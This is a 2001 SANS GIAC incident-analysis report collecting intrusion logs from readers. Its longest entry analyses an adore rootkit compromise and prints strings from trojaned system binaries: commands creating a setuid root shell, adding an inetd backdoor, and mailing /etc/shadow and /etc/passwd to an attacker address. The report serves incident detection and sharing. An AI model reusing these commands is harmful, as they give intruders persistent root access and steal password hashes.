GIAClogo.gif (3726 bytes)

Home

Faculty

Register

FAQ

Contact

Global Incident Analysis Center

Report Date: April 25, 2001 - 1200
threatlevel.GIF (10687 bytes)

Handler on Duty: Matt Fearnow  (Comments in parentheses - send all reports to intrusion@sans.org)
Infocon: Green

Handler Comments:
I would like to invite you all to the pre-opening of Incidents.org. It will become the replacement of this site (sans.org/y2k) If you all could check it out. Let us know if you have questions or concerns. Over the next few days, we will finish migrating everything over to it. http://www.incidents.org

You may be asking why the move from SANS/GIAC site. Well to answer that question, we felt the similarities of the GIAC (Global Information Assurance Certification) and the GIAC (Global Incidents Analysis Center) were too similar. So we decided to move the Analysis Center to Incidents.org. We will continue to provide the information and analysis of log files, plus some new features.

There are now several ways for you to submit your logs and to ask questions.

  • Subscribe to intrusions@incidents.org This list is for help with an intrusion or reading your log files (similar to intrusion@sans.org except it is a "true" mailing list) We will soon have the archives of this mailing list posted on the website. *Note* to subscribe send an email to intrusions-subscribe@incidents.org or for info intrusions-help@incidents.org
  • Subscribe to discussion@incidents.org This list is for general discussion. We will soon have the archives of this mailing list posted on the website as well. There is also a digest of this mail list available. *Note* to subscribe send an email to discussion-subscribe@incidents.org or for info discussion-help@incidents.org
  • Email to handler@incidents.org This is an email alias to the handlers @ Incidents.org. This email is not posted to any mailing list and is not archived or posted to a website.
  • We will soon be accepting log submissions via other means. If you would like you can start submitting your logs to one of our Partner sites, that have agents for various log formats.
Detects Analyzed:
(George Bakos)
Interesting bit of udp traffic broadcasting from a winnt box upon boot-up. 
Haven't had a decent look at it yet, but the traffic pattern alone is
noteworthy.  The user indicates that he ran a binary email attachment (arrrgh!)
a few days ago and since then his A-V won't succesfully start up.

Note the hex dump of the udp payload. I particularly like th byte-order
reversal in the 2nd and 3rd packets.

  6  941.523013 10.1.53.192 -> 10.1.53.255  UDP Source port: 1040 
Destination port: 54322  

   0  00a0 24c6 5a1e 0090 2787 ff98 0800 4500   ..$.Z...'.....E.
  10  0021 0000 4000 4011 5c16 0a01 350d 0a01   .!..@.@.\.......
  20  35ff 0410 d432 000d 7c18 1fab babe     5....2..|.....
 
  7  941.526657 10.1.53.192 -> 10.255.255.255 UDP Source port: 1041 
Destination port: 54322  

   0  00a0 24c6 5a1e 0090 2787 ff98 0800 4500   ..$.Z...'.....E.
  10  0021 0000 4000 4011 9117 0a01 350d 0aff   .!..@.@.........
  20  ffff 0411 d432 000d b118 beba ab1f     .....2........                                  

  8  941.529657 10.1.53.192 -> 255.255.255.255 UDP Source port: 1042 
Destination port: 54322  

   0  00a0 24c6 5a1e 0090 2787 ff98 0800 4500   ..$.Z...'.....E.
  10  0021 0000 4000 4011 9117 0a01 350d ffff   .!..@.@.........
  20  ffff 0411 d432 000d b118 beba ab1f     .....2........                                  

+++

(Thomas Swingle)
Scans\probes  - a lot of them coming  from Korea (KRNIC).   
 
FWIN,2001/04/09,18:39:45 -7:00 GMT,211.223.234.3:3465,63.194.199.xxx:53,TCP (flags:S)
FWIN,2001/04/09,19:40:28 -7:00 GMT,210.62.171.14:2482,63.194.199.xxx:111,TCP (flags:S)
FWIN,2001/04/11,09:16:03 -7:00 GMT,193.159.110.86:62853,63.194.199.xxx:1080,TCP (flags:S)
FWIN,2001/04/11,09:16:09 -7:00 GMT,193.159.110.86:62903,63.194.199.xxx:1080,TCP (flags:S)
FWIN,2001/04/11,14:54:53 -7:00 GMT,203.144.217.163:2051,63.194.199.xxx:53,TCP (flags:S)
FWIN,2001/04/11,17:37:32 -7:00 GMT,212.41.198.191:4428,63.194.199.xxx:1080,TCP (flags:S)
FWIN,2001/04/13,11:53:17 -7:00 GMT,209.217.19.120:111,63.194.199.xxx:111,TCP (flags:S)
FWIN,2001/04/13,12:21:52 -7:00 GMT,193.136.215.126:2401,63.194.199.xxx:111,TCP (flags:S)
FWIN,2001/04/14,10:47:25 -7:00 GMT,211.49.127.38:21,63.194.199.222:21,TCP (flags:SF)
FWIN,2001/04/14,10:49:41 -7:00 GMT,202.157.133.184:1998,63.194.199.xxx:111,TCP (flags:S)
FWIN,2001/04/16,14:37:43 -7:00 GMT,216.216.32.4:0,63.194.199.xxx:0,ICMP (type:8/subtype:0)
FWIN,2001/04/16,17:27:09 -7:00 GMT,211.250.245.67:2938,63.194.199.xxx:111,TCP (flags:S)
FWIN,2001/04/16,17:44:37 -7:00 GMT,210.110.22.123:1740,63.194.199.xxx:111,TCP (flags:S)
 
+++

(Anonymous)
hmmmmm distributed scan?  I'll have to go through the rest
of my logs.  All these packets arrived within a second of
each other.  Anyone else seen this?

Adding mark 24.115.180.238:4703->134.50.5.7:1243
Total Marks: 68
Adding mark 24.115.180.238:4704->134.50.5.7:27374
Total Marks: 69
Adding mark 200.222.64.218:61019->134.50.5.7:12345
Total Marks: 70
Adding mark 200.222.64.218:61020->134.50.5.7:31337
Total Marks: 71
Adding mark 200.222.64.218:61021->134.50.5.7:12345
Total Marks: 72
Adding mark 200.222.64.218:61025->134.50.5.7:31337
Total Marks: 73

+++

(Chris Reynolds)
(Here's a new one - looks like someone wanted control of my server pretty
badly. Too bad for them. I'll be filing criminal charges on this one.)

99       2001-04-16 21:06:43    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.34    community=MGCIwrite    1
39       2001-04-16 21:06:43    2003401  SNMP port probe         208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.34    port=161       6
99       2001-04-16 21:06:44    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.35    community=MGCIwrite    1
39       2001-04-16 21:06:44    2003401  SNMP port probe         208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.35    port=161       6
99       2001-04-16 21:06:44    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.40    community=MGCIwrite    1
39       2001-04-16 21:06:45    2003401  SNMP port probe         208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.40    port=161       6
99       2001-04-16 21:06:45    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.42    community=MGCIwrite    1
39       2001-04-16 21:06:45    2003401  SNMP port probe         208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.42    port=161       6
99       2001-04-16 21:06:45    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.44    community=MGCIwrite    1
39       2001-04-16 21:06:45    2003401  SNMP port probe         208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.44    port=161       6
99       2001-04-16 21:06:45    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.46    community=MGCIwrite    1
99       2001-04-16 21:06:45    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.45    community=MGCIwrite    1
39       2001-04-16 21:06:45    2003401  SNMP port probe         208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.45    port=161       6
99       2001-04-16 21:06:45    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.47    community=MGCIwrite    1
39       2001-04-16 21:06:45    2003401  SNMP port probe         208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.47    port=161       6
99       2001-04-16 21:06:45    2002002  SNMP Crack      208.57.0.134
corpmpowercom134.mpowercom.com   63.74.127.49    community=MGCIwrite    1

+++

(Michael Dwyer)
Scan volumes have increased, here.  Normally, I wouldn't even bother you
with it, but today I came in to work, and the Linux-2.2.18 ipmasq box
had panicked, following a number of up/down cycles of the T1 link. I
think everything is still secure, but I'm curious is anyone else has
seen this?

Apr 16 18:57:09: %SEC-6-IPACCESSLOGP: list 101 denied tcp
212.236.6.2(3213) -> DMZ.NET.169.48(111), 1 packet
Apr 16 18:57:12: %SEC-6-IPACCESSLOGP: list 101 denied tcp
212.236.6.2(3223) -> DMZ.NET.169.57(111), 1 packet
Apr 16 19:02:25: %SEC-6-IPACCESSLOGP: list 101 denied tcp
212.236.6.2(3219) -> DMZ.NET.169.54(111), 1 packet
Apr 16 22:12:10: %SEC-6-IPACCESSLOGP: list 101 denied tcp
210.71.174.26(53) -> DMZ.NET.169.48(53), 1 packet
Apr 16 22:36:24: %SEC-6-IPACCESSLOGP: list 101 denied tcp
63.214.90.206(2797) -> DMZ.NET.169.48(1080), 1 packet
Apr 16 22:41:30: %SEC-6-IPACCESSLOGP: list 101 denied tcp
211.54.39.50(3224) -> INET.T1.CON.26(111), 1 packet
Apr 16 22:41:32: %SEC-6-IPACCESSLOGP: list 101 denied tcp
63.214.90.206(2812) -> DMZ.NET.169.63(1080), 1 packet
Apr 17 00:24:48: %SEC-6-IPACCESSLOGP: list 101 denied tcp
212.33.60.225(4190) -> DMZ.NET.169.48(53), 1 packet
Apr 17 00:30:36: %SEC-6-IPACCESSLOGP: list 101 denied tcp
212.33.60.225(4205) -> DMZ.NET.169.63(53), 2 packets
Apr 17 01:13:30: %SEC-6-IPACCESSLOGP: list 101 denied tcp
62.122.22.238(23) -> DMZ.NET.169.48(23), 1 packet
Apr 17 02:04:29: %SEC-6-IPACCESSLOGP: list 101 denied tcp
212.187.228.216(2687) -> DMZ.NET.169.51(111), 1 packet
Apr 17 02:04:32: %SEC-6-IPACCESSLOGP: list 101 denied tcp
212.187.228.216(2689) -> DMZ.NET.169.53(111), 1 packet
Apr 17 02:09:39: %SEC-6-IPACCESSLOGP: list 101 denied tcp
212.187.228.216(2698) -> DMZ.NET.169.62(111), 1 packet
Apr 17 03:08:19: %SEC-6-IPACCESSLOGP: list 101 denied tcp
128.121.2.143(3317) -> DMZ.NET.169.48(19216), 1 packet
Apr 17 03:13:41: %SEC-6-IPACCESSLOGP: list 101 denied tcp
128.121.2.143(3317) -> DMZ.NET.169.48(19216), 1 packet
Apr 17 03:14:26: %SEC-6-IPACCESSLOGP: list 101 denied tcp
217.58.40.250(1552) -> INET.T1.CON.26(111), 1 packet
Apr 17 04:02:22: %SEC-6-IPACCESSLOGP: list 101 denied tcp
216.119.50.81(1572) -> DMZ.NET.169.48(1080), 1 packet
Apr 17 04:02:24: %SEC-6-IPACCESSLOGP: list 101 denied tcp
216.119.50.81(1704) -> DMZ.NET.169.63(1080), 1 packet
Apr 17 04:02:27: %SEC-6-IPACCESSLOGP: list 101 denied tcp
216.119.50.81(1891) -> DMZ.NET.169.48(1080), 1 packet
Apr 17 04:02:30: %SEC-6-IPACCESSLOGP: list 101 denied tcp
216.119.50.81(2055) -> DMZ.NET.169.63(1080), 1 packet
Apr 17 04:02:52: %SEC-6-IPACCESSLOGP: list 101 denied tcp
216.119.50.81(2841) -> DMZ.NET.169.48(1080), 1 packet

+++

(Rich Parker)
I seem to see a lot of unexpected activity from this
dip.t-dialin.net whomever they are (a German ISP). I got this
in my logs a couple of times, and wrote to them but got no
response. I am inclined to think they just need to be blocked
altogether but thought I'd pass it along because I saw a
similar report today on www.sans.org/y2k/041701.htm 

I think it's time someone put this ISP on notice that this will
not be tolerated.

My logs which correllate to todays reports (except I don't
allow any anonymous FTP's) As I noted this is not the first
time I have seen this sort of poking around from someone on
dip.t-dialin.net - normally the odd anonymous ftp request
wouldn't generate that much notice, but given the repeated
activity and todays report I think it escalates it to a higher
level of interest.

Security Violations
=-=-=-=-=-=-=-=-=-=
Apr  7 23:29:06 relay ftpd[11117]: ANONYMOUS FTP LOGIN REFUSED
FROM p3E9ECE1E.dip.t-dialin.net
Apr  7 23:29:06 relay ftpd[11119]: ANONYMOUS FTP LOGIN REFUSED
FROM p3E9ECE1E.dip.t-dialin.net
Apr  7 23:29:06 relay ftpd[11116]: ANONYMOUS FTP LOGIN REFUSED
FROM p3E9ECE1E.dip.t-dialin.net 
Apr  7 23:29:06 relay ftpd[11118]: ANONYMOUS FTP LOGIN REFUSED
FROM p3E9ECE1E.dip.t-dialin.net

+++
(John Ferriby)
We have experienced an attack using the adore root kit.   We have noticed
several attributes
not mentioned in your messages.

1) The root kit was installed in /usr/lib/kerneld along with numerous other
utilities.
2) Using adore, several processes were cloaked, including a remote-root UDP
shell that
   attached to port 1042.
3) Numerous major utlities were altered in /bin, /sbin, /usr/sbin, usr/bin.
4) Files were cloaked in all of these directories.   In that case, they
would not show
   up unless directly requested, eg:

   #ls /usr/sbin/k*             -produced no results
   #ls /usr/sbin/kernel.pl    -found the perl script that the intruder left.
(the UDP port server!)

5) All of the utilites that were altered performed "reopening" the hole and
sent mail to either
   gushlair@gmx.net or
   mail -s GRK1BD79-Activated gushlair@bigfoot.com
   mail -s GRK1BD25-Activated gushlair@bigfoot.com

6) rmmod, lsmod, modprobe, insmod were disabled.  (they now segment fault)
7) A IRC robot was installed.   This appears to allow remote (!) control of
the system.  (undernet)
8) A clandestine packet sniffer was installed too, "snuffer", which reset
the promiscous bit.
   The interfaces are all switched and the machine receives little
ftp/telnet/pop traffic.  It appears
   that all names/passwords garnered were local.   SSH is used for many
other issues and does not
   appear to be compromised.   Passwords were stored in /var/spool/.sw
9) No users were added, but the irc code referred to "Batman" and "Batman1"
and "Lair"
10) It appears that the attack came from a) kamel.total.net [abuse@psi.net
has been contacted.],
    b) various sites in Romania and c) various sites in Brazil.
11) The attack appears to have begun at about 10 am eastern April 10; it was
discovered at 6:30 am
    eastern on the 11th.

Below is an example of the code that is embedded in many utilties:

[root@video4 sbin]# strings -f /bin/touch | grep -8 lair
/bin/touch:       --version          output version information and exit
/bin/touch: Note that the three time-date formats recognized for the -d
and -t options
/bin/touch: and for the obsolescent argument are all different.
/bin/touch: Report bugs to .
/bin/touch: /usr/local/share/locale
/bin/touch: fileutils
/bin/touch: acgd:fmr:t:
/bin/touch: invalid date format `%s'
/bin/touch:       And the lair is open...
/bin/touch: cp -f /bin/sh /bin/support
/bin/touch: chown root:root /bin/support
/bin/touch: chmod 777 /bin/support
/bin/touch: chmod +s /bin/support
/bin/touch: echo 1529 stream tcp nowait root /usr/sbin/tcpd /bin/support -i
>> /etc/inetd.conf
/bin/touch: killall -HUP inetd
/bin/touch: inetd
/bin/touch: grep -v 1529 /etc/inetd.conf >> /etc/inetd.conf2
--
/bin/touch: echo =-=-=-=-=-= >> /tmp/.mailtmp
/bin/touch: w >> /tmp/.mailtmp
/bin/touch: ps -ef >> /tmp/.mailtmp
/bin/touch: netstat -an >> /tmp/.mailtmp
/bin/touch: /sbin/ifconfig >> /tmp/.mailtmp
/bin/touch: /sbin/ip neigh >> /tmp/.mailtmp
/bin/touch: cat /etc/shadow >> /tmp/.mailtmp
/bin/touch: cat /etc/passwd >> /tmp/.mailtmp
/bin/touch: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/bin/touch: rm -rf /tmp/.mailtmp
/bin/touch: --time
/bin/touch: Paul Rubin, Arnold Robbins, Jim Kingdon, David MacKenzie, and
Randy Smith
/bin/touch: 4.0p
/bin/touch: GNU fileutils
/bin/touch: touch
/bin/touch: cannot specify times from more than one source
/bin/touch: file arguments missing
[root@video4 sbin]#

Below are the utilities affected in /bin

/bin/chown:       And the lair is open...
/bin/chown: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/bin/df:       And the lair is open...
/bin/df: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
/bin/ln:       And the lair is open...
/bin/ln: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
/bin/ls:       And the lair is open...
/bin/ls: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
/bin/mkdir:       And the lair is open...
/bin/mkdir: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/bin/mv:       And the lair is open...
/bin/mv: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
/bin/ping:       And the lair is open...
/bin/ping: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
/bin/pwd:       And the lair is open...
/bin/pwd: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
/bin/rm:       And the lair is open...
/bin/rm: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
/bin/rmdir:       And the lair is open...
/bin/rmdir: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/bin/su:       And the lair is open...
/bin/su: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
/bin/touch:       And the lair is open...
/bin/touch: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/bin/true: --lair
/bin/true:       And the lair is open...
/bin/true: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated gushlair@bigfoot.com
[root@video4 sbin]#

Nothing (??!?) appears to be altered in /sbin

In /usr/sbin:

[root@video4 sbin]# strings -f /usr/sbin/* | grep lair
/usr/sbin/in.fingerd:       And the lair is open...
/usr/sbin/in.fingerd: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/usr/sbin/in.ftpd: gushlair
/usr/sbin/in.ftpd.grk: gushlair
/usr/sbin/in.wuftpd: gushlair
/usr/sbin/sendmail-infected:       And the lair is open...
/usr/sbin/sendmail-infected: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/usr/sbin/sendmail-infected:       And the lair is open...
/usr/sbin/sendmail-infected: cat /tmp/.mailtmp|mail -s GRK1BD25-Activated
gushlair@bigfoot.com
/usr/sbin/traceroute:       And the lair is open...
/usr/sbin/traceroute: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/usr/sbin/wu.ftpd: gushlair
[root@video4 sbin]#

And in /usr/bin:

/usr/bin/du:       And the lair is open...
/usr/bin/du: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/usr/bin/finger:       And the lair is open...
/usr/bin/finger: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/usr/bin/id:       And the lair is open...
/usr/bin/id: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
strings: /usr/bin/kbdrate: No such file or directory
/usr/bin/pinky:       And the lair is open...
/usr/bin/pinky: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/usr/bin/who:       And the lair is open...
/usr/bin/who: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com
/usr/bin/whoami:       And the lair is open...
/usr/bin/whoami: cat /tmp/.mailtmp|mail -s GRK1BD79-Activated
gushlair@bigfoot.com

Here are the contents of the /usr/lib/kerneld:

[root@video4 sbin]# ls -l /usr/lib/kerneld
total 1276
-rw-rw-r--    1 root     root           32 Apr 10 11:22 akeys
-rwxrwxr-x    1 root     root        14738 Apr 10 11:22 ava
-rwxrwxr-x    1 root     root         4196 Apr 10 11:22 gen
-rwsr-sr-x    1 root     root       373176 Apr 10 11:22 kerneld
-rwxr-xr-x    1 root     root         1025 Apr 10 11:22 logrotate
drwx--x--x    3 root     root         4096 Apr 12 04:15 mech
-rwxr-xr-x    1 root     root        18185 Apr 12 12:44 n
-rw-r--r--    1 root     root         6323 Apr 12 12:43 n.c
-rw-r--r--    1 root     root       102988 Apr 17 09:35 netbeui.log
drwx------    5 john     john         4096 Apr 12 14:12 nmap-2.53
-rw-r--r--    1 root     root       584385 Apr 12 13:50 nmap.tgz
-rw-r--r--    1 root     root         3956 Apr 12 13:00 out.txt
drwxr-xr-x    5 root     root         4096 Feb  5 12:58 psybnc
-rwxrwxr-x    1 root     root         4984 Apr 10 11:22 scan
-rwxrwxr-x    1 root     root         4060 Apr 10 11:22 sense
-rwxrwxr-x    1 root     root         6124 Apr 10 11:22 sl2
-rwxrwxr-x    1 root     root         5008 Apr 10 11:22 snifu
drwxr-xr-x    2 root     root         4096 Apr 10 11:22 stat
-rwxrwxr-x    1 root     root        11376 Apr 10 11:22 statdx
-rwxr-xr-x    1 root     root        33116 Apr 10 11:22 tfn
-rwxr-xr-x    1 root     root          662 Apr 10 11:22 udpshclient.pl
-rwxr-xr-x    1 root     root        11540 Apr 10 11:22 wsnf
-rwxrwxr-x    1 root     root        26900 Apr 10 11:22 wu
-rwxrwxr-x    1 root     root         5548 Apr 10 11:22 wus
-rw-rw-r--    1 root     root           59 Apr 10 11:22 www.log
-rwxr-xr-x    1 root     root         1438 Apr 10 11:22 z1
-rwxrwxr-x    1 root     root         4036 Apr 10 11:22 z2
[root@video4 sbin]#

You may contact me for more information or inspection if you need.  The
system is quarentined
and will be re-imaged on Friday, 20 April.
 

<< Back to GIAC

 

Home  |  Events  |  Publications  |  Security Digests
Resources  | 
Web-Based Training  |  Contact SANS

 

� 2000 SANS Institute  :  Office 301.951.0102  :  Registration 720.851.2220  :  Web Contact scott@sans.org